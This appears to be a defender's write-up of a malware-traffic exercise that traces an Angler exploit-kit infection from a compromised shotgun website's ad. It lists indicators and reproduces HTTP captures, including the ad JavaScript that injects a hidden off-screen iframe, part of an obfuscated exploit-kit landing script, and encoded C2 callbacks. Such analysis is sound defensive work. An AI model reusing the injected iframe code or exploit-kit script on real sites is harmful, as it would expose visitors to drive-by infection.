So this one has a great comical backstory – how the user (ironically from the SOC) Tom brought his personal laptop in and managed to get his system infected while looking for a shotgun to go hunting with. Outside of making me and one of my co-workers laugh at the scenario (and then another one asking if this could be based on a real event – lol), there is one thing that I learned from this and it was from reading the answers. Brad explains how he went about finding the start of the infection chain from working backwards using the filter of “ip contains [whatever the EK domain is] ” in Wireshark and keep going up the chain until you get to the start. I will have to remember this for my everyday work as well. Generally, I end up finding the end of the infection chain, and just using the “referer” from the TCP Stream to point me into the right direction. Definitely good to know to say the least.
I also did not know that “Bedep” will drop encrypted binaries onto the system via memory and NOT onto the disk. For more information about this, @Kafeine has more information about this here.
Lastly, since the malicious files were encrypted, I was not able to run them on my test VM. But I do have them along with all the other artifacts from my investigation located on my GitHub page found here.
Basic Questions to Answer About Exercise:
=========================================
– Date and time of the activity.
> First Packet: 2015-11-24 10:13:42 / Last Packet: 2015-11-24 10:22:23 / Elapsed Time: 08:41
– The infected computer’s IP address.
> 10.1.25.119
– The infected computer’s MAC address.
> a4:1f:72:a6:9c:1b
– The infected computer’s host name.
> Turkey-Tom
– Domains and IP addresses of any infection traffic with VT detection ratio.
> 52.22.18.194:843 | 0 / 55
> 52.21.140.191:843 | 0 / 56
> 64.34.173.208 | www.showtgunworld.com | 1 / 66
> 162.216.4.20 | neuhaus-hourakus.avelinoortiz.com | 2 / 66
> 166.78.145.90 | rnhbhnlmpvvdt.com | 8 / 66
> 151.80.126.226 | chin.truffleman.co.uk | 1 / 66
> 95.211.205.229 | ncqauqvqqhhzpc.com | 1 / 66
– DNS requests noted during the investigation:
> 11981 176.540744 10.1.25.119 63767 8.8.4.4 53 DNS Standard query 0x2749 A jtikbwiyllxnyi61.com
> 11983 176.819935 8.8.4.4 53 10.1.25.119 63767 DNS Standard query response 0x2749 No such name
> 11984 176.821924 10.1.25.119 60109 8.8.4.4 53 DNS Standard query 0xc23c A ghgmtcrluvghlwc91.com
> 11988 176.915258 8.8.4.4 53 10.1.25.119 60109 DNS Standard query response 0xc23c A 127.0.1.1
> 11989 176.926720 10.1.25.119 58168 8.8.4.4 53 DNS Standard query 0x5cc3 A ghgmtcrluvghlwc91.com
> 11990 177.005193 8.8.4.4 53 10.1.25.119 58168 DNS Standard query response 0x5cc3 A 127.0.1.1
> 11997 178.041367 10.1.25.119 57199 8.8.4.4 53 DNS Standard query 0x043c A qidxwsfqblej.com
> 11998 178.171919 8.8.4.4 53 10.1.25.119 57199 DNS Standard query response 0x043c No such name
> 11999 178.173503 10.1.25.119 58882 8.8.4.4 53 DNS Standard query 0xdad5 A lnhxwmhoyjxqmtgn9u.com
> 12000 178.254598 8.8.4.4 53 10.1.25.119 58882 DNS Standard query response 0xdad5 A 127.0.1.1
> 12001 178.268719 10.1.25.119 52742 8.8.4.4 53 DNS Standard query 0x1cf7 A lnhxwmhoyjxqmtgn9u.com
> 12002 178.348164 8.8.4.4 53 10.1.25.119 52742 DNS Standard query response 0x1cf7 A 127.0.1.1
> 12040 179.351621 10.1.25.119 53261 8.8.4.4 53 DNS Standard query 0xf345 A hsgxnjpdzifkjl4r.com
> 12068 179.449632 8.8.4.4 53 10.1.25.119 53261 DNS Standard query response 0xf345 No such name
> 12073 179.452374 10.1.25.119 62977 8.8.4.4 53 DNS Standard query 0x57eb A xwhrskktvevezz0.com
> 12112 179.540378 8.8.4.4 53 10.1.25.119 62977 DNS Standard query response 0x57eb No such name
> 12113 179.542265 10.1.25.119 50010 8.8.4.4 53 DNS Standard query 0x2997 A rnhbhnlmpvvdt.com
> 12158 179.651092 8.8.4.4 53 10.1.25.119 50010 DNS Standard query response 0x2997 A 166.78.145.90
> 12163 179.663157 10.1.25.119 50005 8.8.4.4 53 DNS Standard query 0xb4c8 A rnhbhnlmpvvdt.com
> 12194 179.748103 8.8.4.4 53 10.1.25.119 50005 DNS Standard query response 0xb4c8 A 166.78.145.90
> 12303 179.968038 10.1.25.119 61287 8.8.4.4 53 DNS Standard query 0xb54b A qtllebdadvitdim.com
> 12334 180.059365 8.8.4.4 53 10.1.25.119 61287 DNS Standard query response 0xb54b No such name
> 12335 180.060984 10.1.25.119 56286 8.8.4.4 53 DNS Standard query 0x9da2 A wyvpeiyaxycznuia6.com
> 12372 180.155660 8.8.4.4 53 10.1.25.119 56286 DNS Standard query response 0x9da2 No such name
> 12373 180.157299 10.1.25.119 49396 8.8.4.4 53 DNS Standard query 0xb029 A ncqauqvqqhhzpc.com
> 12411 180.238941 8.8.4.4 53 10.1.25.119 49396 DNS Standard query response 0xb029 A 95.211.205.229
> 12415 180.252274 10.1.25.119 51862 8.8.4.4 53 DNS Standard query 0x7ebc A ncqauqvqqhhzpc.com
> 12453 180.348244 8.8.4.4 53 10.1.25.119 51862 DNS Standard query response 0x7ebc A 95.211.205.229
> 13636 193.071344 10.1.25.119 55508 8.8.4.4 53 DNS Standard query 0x8551 A chin.truffleman.co.uk
> 13637 193.272985 8.8.4.4 53 10.1.25.119 55508 DNS Standard query response 0x8551 A 151.80.126.226
– Information about malware found on the infected host.
> The malware associated with this infection looks to be related to Angler EK starting with a Flash exploit.
– The root cause (what is the likely cause of the infection noted in the pcap).
> The root cause for this infection is from a compromised website (shotgunworld[.]com) with a malicious ad that redirects the end-user to the Angler EK page.
Notes about investigation:
==========================
Looks like the host “hxxp://www[.]shotgunworld[.]com” is the initial site that is compromised via what looks to be a malicious Javascript ad off the shotgunworld site (mind you that this is a hidden iframe from what I can tell):
GET /adserver/www/delivery/ajs.php?zoneid=1&withtext=1&cb=99806861739&charset=utf-8&loc=http%3A//www.shotgunworld.com/&referer=http%3A//www.google.com/url%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds%26source%3Dweb%26cd%3D1%26sqi%3D2%26ved%3D0ahUKEwiKnu-0uqnJAhUIWD4KHal9DUcQFggcMAA%26url%3Dhttp%253A%252F%252Fwww.shotgunworld.com%252F%26usg%3DAFQjCNEURWbI-lwIgSRkGqiR9ALrodRMUw%26bvm%3Dbv.108194040%2Cd.dmo HTTP/1.1 Accept: application/javascript, */*;q=0.8 Referer: http://www.shotgunworld.com/ Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: www.shotgunworld.com Connection: Keep-Alive Cookie: OAID=380cc1bbe19b8e1255013f1f986ddebe; OAVARS[abf85608]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22oadest%22%3Bs%3A26%3A%22http%3A%2F%2Fwww.gueriniusa.com%2F%22%3B%7D; __utma=249653828.1397841079.1448381776.1448381776.1448381776.1; __utmb=249653828.3.10.1448381776; __utmc=249653828; __utmz=249653828.1448381776.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __utmt_UA-44006917-3=1; __utmt_UA-24085258-3=1; __utmt_UA-17979443-1=1 HTTP/1.1 200 OK Date: Tue, 24 Nov 2015 16:16:24 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Pragma: no-cache Cache-Control: private, max-age=0, no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT P3P: CP="CUR ADM OUR NOR STA NID" Set-Cookie: OAID=380cc1bbe19b8e1255013f1f986ddebe; expires=Wed, 23-Nov-2016 16:16:24 GMT; path=/ Content-Length: 1479 Connection: close Content-Type: text/javascript; charset=utf-8 var OX_7f561e63 = ''; OX_7f561e63 += "<"+"iframe style=\"position:absolute;left:-3060px;top:-4000px;width:360px;height:357px;\" src=\"http://solution.babyboomershopping.org/respondents/header.js\"><"+"/iframe><"+"a href=\'http://www.shotgunworld.com/adserver/www/delivery/ck.php?oaparams=2__bannerid=3__zoneid=1__cb=0d1dc4c39c__oadest=http%3A%2F%2Fwww.americhoke.com\' target=\'_blank\'><"+"img src=\'http://www.shotgunworld.com/AmerichokeBanner.gif\' width=\'468\' height=\'60\' alt=\'Americhoke\' title=\'Americhoke\' border=\'0\' /><"+"/a><"+"br /><"+"a href=\'http://www.shotgunworld.com/adserver/www/delivery/ck.php?oaparams=2__bannerid=3__zoneid=1__cb=0d1dc4c39c__oadest=http%3A%2F%2Fwww.americhoke.com\' target=\'_blank\'>Choke tube installation barrel porting adjustable combs<"+"/a><"+"div id=\'beacon_0d1dc4c39c\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://www.shotgunworld.com/adserver/www/delivery/lg.php?bannerid=3&campaignid=3&zoneid=1&loc=http%3A%2F%2Fwww.shotgunworld.com%2F&referer=http%3A%2F%2Fwww.google.com%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds%26source%3Dweb%26cd%3D1%26sqi%3D2%26ved%3D0ahUKEwiKnu-0uqnJAhUIWD4KHal9DUcQFggcMAA%26url%3Dhttp%253A%252F%252Fwww.shotgunworld.com%252F%26usg%3DAFQjCNEURWbI-lwIgSRkGqiR9ALrodRMUw%26bvm%3Dbv.108194040%2Cd.dmo&cb=0d1dc4c39c\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n"; document.write(OX_7f561e63);
Once the connection is made from ‘solution[.]babyboomershopping[.]org’ I see that there is another redirect made to the site ‘neuhaus-hourakus[.]avelinoortiz[.]com/’:
GET /respondents/header.js HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://www.shotgunworld.com/ Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: solution.babyboomershopping.org Connection: Keep-Alive HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Nov 2015 16:18:32 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.3.3 c0 <iframe style="position:absolute;left:-3311px;top:-3861px;width:309px;height:326px;" src="http://neuhaus-hourakus.avelinoortiz.com/forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29"></iframe> 0
Once the connection has been made to ‘neuhaus-hourakus[.]avelinoortiz[.]com,’ it looks like it lands the user to an Angler EK landing page since it has that tell-tale page of quotes and scripts spread throughout:
GET /forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://solution.babyboomershopping.org/respondents/header.js
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: neuhaus-hourakus.avelinoortiz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Tue, 24 Nov 2015 17:13:18 GMT
Content-Type: text/html
Content-Length: 94921
Connection: keep-alive
<!DOCTYPE html>
<html>
<head>
<title>
you something that might you,
</title>
</head>
<body>
<strike>
"How horrid all this tumbling about and I believe I have borne with calmness, and she dared not follow her to accept your invitation here?"-- "It was my comfort.
</strike>
<ol>
Yet, though smiling to see them once;
<u>
<em>
" This however was not very likely." "Well, and whose possessions he was monstrous happy, and rather better pasturage for their ease and enjoyment, and only prevented from being her relations too made it appear that she had hoped to be to
</em>
might at present confess to her own composure of voice, under which was exactly the reverse of her mind might be found when the life of sin. Her legal allowance was not in the and
</u>
<ol>
A man must pay for his intrusion on that head. The would probably have passed without suspicion, had he married you, he have
<i>
s delicate, enquiries
</i>
</ol>
<form>
Their opportunity of introducing it, and on misters They's suggestion; and humoured
</form>
</ol>
<div style=" width:8px; height:18px;"><p ui ="I3Zj-#qm1pQOPHiOOprmDg">wd['p]i' mO wwhno'V=u ncia'x( nio1t;fWxtv{ard ) wetnaT = e)e; aDa et arDvt(pmtlu; op et {D =dnlmtawn Dt}=hw)( e a e ; t mpadl e eatiDe( -t;T }fo escnnu< x)it btas(iDwo{ n)teaaw dOpmV];'ni = ['hw''wo[vg'ro ;= u]dWw't e = awaodesilvfrt ;nWvbaM=.niLj cwufO jwv.OWasow cM udbwfLj=.ofvWjn 1uaLbiOdwcMfdiowfu LjWOMv=.wnabct=; i2s nuoff} tcnruy( dt'[w o{e)Qeniw]F =t}tnueu rr x' ;f oxTxet {l()tceinni e sut,arr = vlrr""al=in.(y..ta/mae hc( )fo i/0 av ()rg; r= arag ;l.ty;ri<neh{) rs=+rttl uie+ + Sr.omhenraCr(aiCgfdop(nara e/)i[3ysrIt,]2 rte)tlnrsu2e;}r ua r cd mu Loj;M}v =ce.tEeyn"(neImeltgBtdcu") bep1c"GW,aM= pc 2=iG"= "dcln",G ;1+1"dhnGoi ;c" Cc uftuTe(, r)rv nsxr{ ae w m; o.eg axI=n)(x a= ;clx .x nrodrs=st);MaecGLj"cT x("[+]c(x;r+;0ern 1)G2ut nfctou}fpx en i urT_) {x'fa6ur7T( ,r(e4uk2u606u65k7374325o4246q0oe676c6462766iagg3gc 0,f5i+22327'o x;Treark37'7( u) 6466u3kouu477065252464e0q4ci62 '6o5666627aor,);}t nufi + f cnoVu(){nTgifia x re( vurseAitxenengaro..tdS'IE)1f &== O'(M- &aito.ranoppsanrvgeVixdOf'ni)'irtT.(need/1 ) n= }te;r {=-ru ! !wn_iD_woId if(_.ELOBA_LVOCNOECERTOOS__NLIE'MRB||_ MNAD( _TEOOSOWS_OCL_OLSRSNENFC'idF))w onA EUniwDeatb; tees a{ast)(s(r);r;u ut eQ eynr}v x,xKaep= a0v rk' sIyeVrtsKl+ u'rik.' a'o +'gyJ.Pdire baulnrsipA v= 'ixpatac, 1 x2= x'10x' 0,+ . x= 04,0_ +_ x 3.'5t;ry{=1wevk . ' xnvteXbxA ;ce1j Oci(t)wd.seei }t ;=w2nour (ce){=alavk c th xfr y e wxvnks{;t= eeiXOj2c} tc)eAbtvx(;ht(e cafk ={ )acxv t;ry{=swevk l e xnvteXbxA ;ce3j Oci(t)cah()x f { }ectvk= ewidelrt.w=oans;1s } ve{ fix u};}k()attaa sQt(ess beD;)e)y; e ev ru}turr(;n a tha[rc4 a tad p ='886oaoii63447666654co86a4g8u26s6267667aau626626,'343323323a4qc7e2o'q46457 6545ac426a0ue67686572676uo0842a6os6686757554uuc666sas627a2662576gu6u34ce4' 3a'333223c,eq624cce75a4657475oqa4208o2o56u7665766u6207a8u8s64u66575466s6c2sau6436g2756762a66630i,uu43i 32323'c'626oai4875o7576666c4o244ueaa62g77766640a0842886u6686676727iio67as6ss26i7666757s8ag2u66a23243362762u2',502o0a6646736' 62oo6502ooa66467667562o0658u6o246u5666727ooo06i6i0s67266767668u6o6a8u6267a67775750sci6aom8a66u2676676usua2644g832u327362360f;or( ;0ra=v' ] i p<atdeihtatna h l.g)+ xr( ht_epu;T+ifpaia],sra ;Qtyed t[eu)ahta=;af un p tdll}otn T)nv eu ruxci(A{2 ="2r074o75a k6m6646mi2ao5406267776o46270amm027477466766i k= 46,5qs6i2"" 387277a7246 =,"00c6i4k 768677450s684"aisa6276a7626 ,870i64a6i7" "56645087ouk81=26276a7626 ,870i64a6i7" "55"44k45,ak02=a4 4 6554 2o652i34="8545 ="g"o67o650 ,k66aga2s8uo436o2666672o626304 u5" ,="23236k 66633662os2o4o8qc86623u2332"ec3c4u664a33hadaa' 26 =4 ,tpt [q2e74a8o67746666767ias278i20e74q6226466qoa45oqq2g76466667662a8s6oo48432u22762636u,4 'qe0476266343'7o2i478a2a872667666740sqq62o4io56e67662472ais6s60aa63023776630sua264igm44u5273624862q4eaqio6 ,6'44444"2426a4ae027i7776676868s6iq02u67a6442677goo86q4sig7626666752aa6u34u0a" 34"3622230,o27e24q87647746666ai0642sqag7684766722iauo6i840a66o6577666q2ga6auus0336322267244",4q222a67o7636" 6e48i6a6s4i640726777628ga70o8qa76u5626477iosi760ssg73063636620a6u34u6ai4484462225ime24a,4qs65'6 4"4478aq06i6o8i6645766245u8s26ia88645q6677665oqcs6ieouu26s62666668ou4266i6,'303323323i8486asq'662866 65740iou58is4a76867766562i8o6q68qq67i67655576aag66me6866i2646666ssuo2646oi32u326362360,8 k +ic3k +323' 3'006cuess62467263250ieu76048676e6562677um826iu 8,57s+67667'6k k3+sk '3'3 2+2c0k,2 'ks2 33k++5 +ek 5,k30' + 23 '+k +003i k4 +6k2+3'33 , '+340 3,632+3k3 '0k k3+0k233'3 2+342c27kmoo86642756676ssuo2644oo44u426362442 k2+ o343k' 4 ',+ 353o73+3 ,c3kg0g24 '6k+3 3256432'k+ 03333c'+27k ,6 ko ggk +3 2323 7o030s38+'s25'3 +6+3 3k ,gkgc 2k33a235 3gs2o0+s'2037+'k6 k3 + 23kg,c + 23s32733g23gs'02ao536+, 2 '3' ++ ck k3k 3202333'co5g42sasg73 6k2+++c34k k, 0' 0+k, s 02kk 253'+ 423s3' + k+k +0'e,52+0 '4ikk+30'3 34 30 k+ 43,30+ 406k 2' 3+'k6 k3+ 24k2,0 +004322c'm66o75 33372kos2s8u4436o2676662o64442o u+ 'ok42444, 2+0 '44kg73053 34 32o c+k, g 02kk 363'+ 4330333 'co5g6+2'4g73 6k2+++234k k, 0'0s2s0g8 '7o3533233gck,2 k3204'k++6 + 323s3532+ g7coa0s0g3'2 +k'6a3 034k ,k +2s032ocsk+3g'725323g k+ 43,2a+ 206k 2' 332457'36kg3 gso0sc3++2 k12 s2 +3 ,4k 3'80s5og 0,63g+33723'ck k4 3k3s' a+ 12+23253o73+2 ,c3kg0gs0 '6k+41+a2033'2 k 32so27ggksk 'c632335+ ,4 1 2 2023s'2++ka3375g33632k ',csg4ok+ 2k +'s+o53032 4240cg' k g4k ,+67+332k 2 0327 3g03gs26+'o536+, 23'' + ck k4k+0s5og 6,63g+33723'ck k4 ;kro6k + 22+] f ai <(ta ; 0 =vr ip.tleg+dx ;hithnaa+ )pef(aar,]dh[tTpu_taiattaaks =)e2s beD ; k=40==3244k k 1k3k =k6=p = 5 4k =tda tTxlu}na=ha;l )V; T)uWxeu;rrxe((A 4(00; i a)t1 </p>
<form>
From here I can see a POST back to the site – most likely passing stats about the system to craft the correct exploit:
POST /forums/fiscal.hypetemplate?machine=0erT2JL5&idea=bAtrR&oh=&other=4vm3vmKv&woman=&shoot=gN9eEjH&process=f2r-BDMy&minute=&larger=kST8&difficult=WgR0Lms5 HTTP/1.1 Accept: */* Content-Type: text/html; charset=utf-8 Referer: http://neuhaus-hourakus.avelinoortiz.com/forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29 Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: neuhaus-hourakus.avelinoortiz.com Content-Length: 188 Connection: Keep-Alive Cache-Control: no-cache cEZQAoBD1JC2osm3oFWTx6csMwLYXl+8RNz2OEKzknDTEKBSkw4/mlx1gN/345+/pYTRuM5b/246rNtClafKXD4ry38xe+d968qKHE/Uo26gHKN5w+cOrO0lxSquj/PE41q2pvRFKl4MIpPiN1uaJg7lsHGCoUcbJgmQPqmO2CBlBK+6zgUxNzg0MA==HTTP/1.1 200 OK Server: nginx/1.8.0 Date: Tue, 24 Nov 2015 17:13:21 GMT Content-Type: text/html Content-Length: 2384 Connection: keep-alive
And here is the malicious Flash file:
GET /who.olp?save=&effect=VFv9cHM&you=LmzXy&picture=J0sYyqN&why=Dv0ZsHPosOWnZsEC9KJ9myAYKZSGT HTTP/1.1 Accept: */* Accept-Language: en-US Referer: http://neuhaus-hourakus.avelinoortiz.com/forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29 x-flash-version: 19,0,0,207 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: neuhaus-hourakus.avelinoortiz.com Connection: Keep-Alive HTTP/1.1 200 OK Server: nginx/1.8.0 Date: Tue, 24 Nov 2015 17:13:22 GMT Content-Type: application/x-shockwave-flash Content-Length: 75602 Connection: keep-alive CWS #*..x....X.A.- .`............].....ACp.......w
And another POST to the server:
POST /station.htm?again=&meet=wuzqI0&indeed=ypZLR7M&artist=&give=V_CvGhey&throw=&agreement=IWAIiztB-DCJSkcANq-qiph2Tah HTTP/1.1 Accept: */* Accept-Language: en-US Referer: http://neuhaus-hourakus.avelinoortiz.com/who.olp?save=&effect=VFv9cHM&you=LmzXy&picture=J0sYyqN&why=Dv0ZsHPosOWnZsEC9KJ9myAYKZSGT/[[DYNAMIC] x-flash-version: 19,0,0,207 Content-Type: application/x-www-form-urlencoded Content-Length: 196 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: neuhaus-hourakus.avelinoortiz.com Connection: Keep-Alive Cache-Control: no-cache xWRNDYEAqwYYwZ+peJN+So3iLI4/QWR/Z3+2aQkLn2RlsXwiqFOkyIbC1EWZuHWy1CwXdWfy+RfJh1cyIB9dOMCnPQoXtnlZlJOKDFFa85bHYiPt9q9iAnzuol+r63UCM1/u1X2tFaTTCi1Xked2sZIbqZgt6wuUqzLOo+28kb0VXiGBYGgKMTksMCwwLDIwNw==HTTP/1.1 200 OK Server: nginx/1.8.0 Date: Tue, 24 Nov 2015 17:13:26 GMT Content-Type: text/html Content-Length: 5528 Connection: keep-alive
And here is the site delivering the malicious binary files to the user’s system:
GET /literature.disco?audience=5Hr&trip=&election=txK1BgKFW&piece=aRLmxzX&normal=QGOT&understand=IWOBe&theory=so8bghs&discover=y47E5&tell=gSIQ&opportunity=ZWe&available=z HTTP/1.1 Connection: Keep-Alive Accept-Language: en-EN Host: neuhaus-hourakus.avelinoortiz.com HTTP/1.1 200 OK Server: nginx/1.8.0 Date: Tue, 24 Nov 2015 17:13:27 GMT Content-Type: application/octet-stream Content-Length: 660972 Connection: keep-alive ----- GET /yes.wbxml?unite=tXu9a5tJI&writer=J7y8dCR8F&describe=LzQOS9&for=¬e=C26Z8129ea&number=gcsXv8v&next=2unI-c8 HTTP/1.1 Connection: Keep-Alive Accept-Language: en-EN Host: neuhaus-hourakus.avelinoortiz.com HTTP/1.1 200 OK Server: nginx/1.8.0 Date: Tue, 24 Nov 2015 17:13:31 GMT Content-Type: application/octet-stream Content-Length: 660972 Connection: keep-alive
– Once the files have been downloaded from the above connection and installed, we see the malware trying to connect to two different IP addresses (52.22.18.194 / 52.21.140.191) on port 843. One thing that we can see is that the connection to these IP addresses are blocked since we only see the SYN packet being sent and no response from the other end:
Once again I am reminded of why it is a good idea to block any outbound connections except for well known ports (80/443/465/995/etc…) and having the logs for any/all of that traffic. Granted one then needs to be able to ingest those logs and make sense of them as well. And don’t for get about your exceptions and having an exception process!
And now for the call-backs from the malware that was deposited on the system:
POST /include/class_dm_event.php HTTP/1.1 Connection: Keep-Alive Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Content-Length: 263 Host: rnhbhnlmpvvdt.com ogis0=uq+2TOoO36/E3djA7FAY+qOQp6njry09&e=3HcbGddeYpGhIaiiCgDfit2Ka6pwf9z6U9SV&oaqe=Yr7rA6V7flvNGrf/TshfqMLu0k6Bvq3tSPELVxAJkdC65dMe&oumkmm1=AmLf8T37jecJCNXacLepDLfFjH1UivyisxI5XCUaa2zjQ9meadjT8qdYm+fj&y=nrOdI1OUNk+70KCnnMpGUpEo7syABmmqvaGuLIvDIq2fMn41gBBeaYeVvW0= HTTP/1.1 200 OK Date: Tue, 24 Nov 2015 16:17:22 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.10 X-Sinkhole: malware-sinkhole Vary: Accept-Encoding Content-Length: 0 Keep-Alive: timeout=1 Connection: Keep-Alive Content-Type: text/html
Interestingly enough, we can see a couple of POST requests being made to the server, but the response made from the server has the CONTENT-TYPE of “application/octet-stream.” Since this is the response from the server, I do not believe that these are binary files at this time:
POST /include/functions_newpost.php HTTP/1.1 Connection: Keep-Alive Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Content-Length: 277 Host: ncqauqvqqhhzpc.com skgkmuq=2NKRclhTaaVcZfcfyHVUbhwfSld0Zju7&ewueoc=PswwbVqsNwbSgcqfG6gImfag&c=9JK1TVsiirO56TNCRSpf9LksdgM7&msmui=lBJh+rlt3H8VdbhdKI0280o2&y0=2qPbVGijLyJymtapuwZaLfNm7Kgmj5GtWigUmWGFfOqZ&k=/A+hPvXyhmaoXk/ARfa6o/7Q7OhyrnOoFe3+Ocq/dvhHHXzRR3e/&mgacue=b/1tQDvJswplB85kjSLVc4kED+uPy2U= HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Nov 2015 16:16:42 GMT Content-Type: application/octet-stream Content-Length: 587 Connection: keep-alive Set-Cookie: PHPSESSID=9b6f301d3b6400079694d341333b6959; expires=Wed, 25-Nov-2015 16:16:42 GMT Set-Cookie: walkover=6258; expires=Wed, 25-Nov-2015 16:16:42 GMT Set-Cookie: rigidity=7597; expires=Wed, 25-Nov-2015 16:16:42 GMT Set-Cookie: staunching=4382; expires=Wed, 25-Nov-2015 16:16:42 GMT ----- POST /newthread.php HTTP/1.1 Connection: Keep-Alive Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US Referer: http://lnhxwmhoyjxqmtgn9u.com/search.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Content-Length: 214 Host: ncqauqvqqhhzpc.com moycq=uskrE77T5r1UtuRf&esuyuc=5EogXNdl7mULw6YgehMEBu4n&eicww5=JN8vwWDSDeUquJeK&my=QgXKqX/MgvVEp/o1IfmO&we=sfFo65FUZ5QDgmswsUkkj2Fg&wkmekkc=UZDILSO9ndxh/s7z&m=N/0xqJ/9awqYtpKpX6eb6939K4FBS4Qy0au/Zwn3IbHiS9IQjG3yN7M= HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Nov 2015 16:16:45 GMT Content-Type: application/octet-stream Content-Length: 671932 Connection: keep-alive Set-Cookie: PHPSESSID=52f98d522ab4e44a8cf557ed9830dc51; expires=Wed, 25-Nov-2015 16:16:45 GMT Set-Cookie: zebra=5401; expires=Wed, 25-Nov-2015 16:16:45 GMT Set-Cookie: spittle=7253; expires=Wed, 25-Nov-2015 16:16:45 GMT Set-Cookie: saffrons=3122; expires=Wed, 25-Nov-2015 16:16:45 GMT Set-Cookie: revisiting=3533; expires=Wed, 25-Nov-2015 16:16:45 GMT Set-Cookie: yogi=4911; expires=Wed, 25-Nov-2015 16:16:45 GMT ----- POST /blog_ajax.php HTTP/1.1 Connection: Keep-Alive Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US Referer: http://ncqauqvqqhhzpc.com/newthread.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Content-Length: 996 Host: ncqauqvqqhhzpc.com Cookie: yogi=4911; revisiting=3533; saffrons=3122; spittle=7253; zebra=5401; PHPSESSID=52f98d522ab4e44a8cf557ed9830dc51 c1=gmxF3phTjC+8OFSGFNCdljAPS0FGt3OrKkO2rt71bkoTFgcUyJcx/3Pm+fQoubED4QiA1EGXVmmKkLotN6lYw0rZ83NSrcQwLJmoJXa7pNalVstc&wciqei=+Wh9WDa2CTJA6H07QIzW9BWR14ILJumro+UojZayYUYndmrStcwZqEanE6tnooX2bUl2lDl9Q0SiMMR6iOdPYGXmqKxntkC54efmn9ECKLWoykp0KoowkyeLRTHVc73xFPPbVGlrEmgjqXg/Tu0RyFCKoJmJW699rsZ0NK9dtCPbpZCw3iIPVJMLiQXQ9uRs6TGHaYoiH78+D8fgAY0Aq1A3&qeoqeeq=Q+fWoMnvsrmEM8iDyNIz7ccDVeRmhcoFeUrCD6+gnHYbXB748S6h0o7E2zxXxC3aH+PgDIesUKaAbT3TABkWNQFglVRXEeaIs4+4S4Wa/2wODHbbgzofHqucgiqz4RJg&oi=aMKP8Kk4nh8286Us7L/9VTrztIDRNq/I3jJJpkO+WD9DuVtYgWnaXtR1hiYFBE06Wy6wyjzSBDI9HqcKBYPoNlQ9PZ10hXbmJcNK1qnv+NlTAt51TEyBbQ4er0b2JF1lQK0WIhKGbwAFbmY7pqUMgPo5yV+b+nYcCh3pHU43&mium5=4lH4p7o6NX+W0FxYJBt8L26UFaZ4sqGRyvg58sZZDUYn1eynh5+s3rpYOvlqWylYiqV7NzYiGPqN/BeArceWuphTwo1aXyn+GTHoHi7CnLrfSnYmcqxEg3yjC4jlBCUAQirXOL0KccjnincV6uLUQELc&moo=qf44CM+7QIwIOumHRqN59g8R4FzuCM0JLyITIC3+X16YW7egCD4z86y/wZQUVUWhRArANwZdDj1ixy/fHlSwEBN4RoBl/L+iQSohJcSqNgLIfIOyopy7Bzqmr8zCcErpZYANscig7vbesHGijVmeuupkHodtFABMBc6Hj8+MfMCLNoHLDQY04qJf HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Nov 2015 16:17:08 GMT Content-Type: application/octet-stream Content-Length: 37 Connection: keep-alive .J..........|...4.+...+....3.g2M.....
We then see the last POST to a different server this time:
POST /news.php HTTP/1.0
Host: chin.truffleman.co.uk
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 705
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
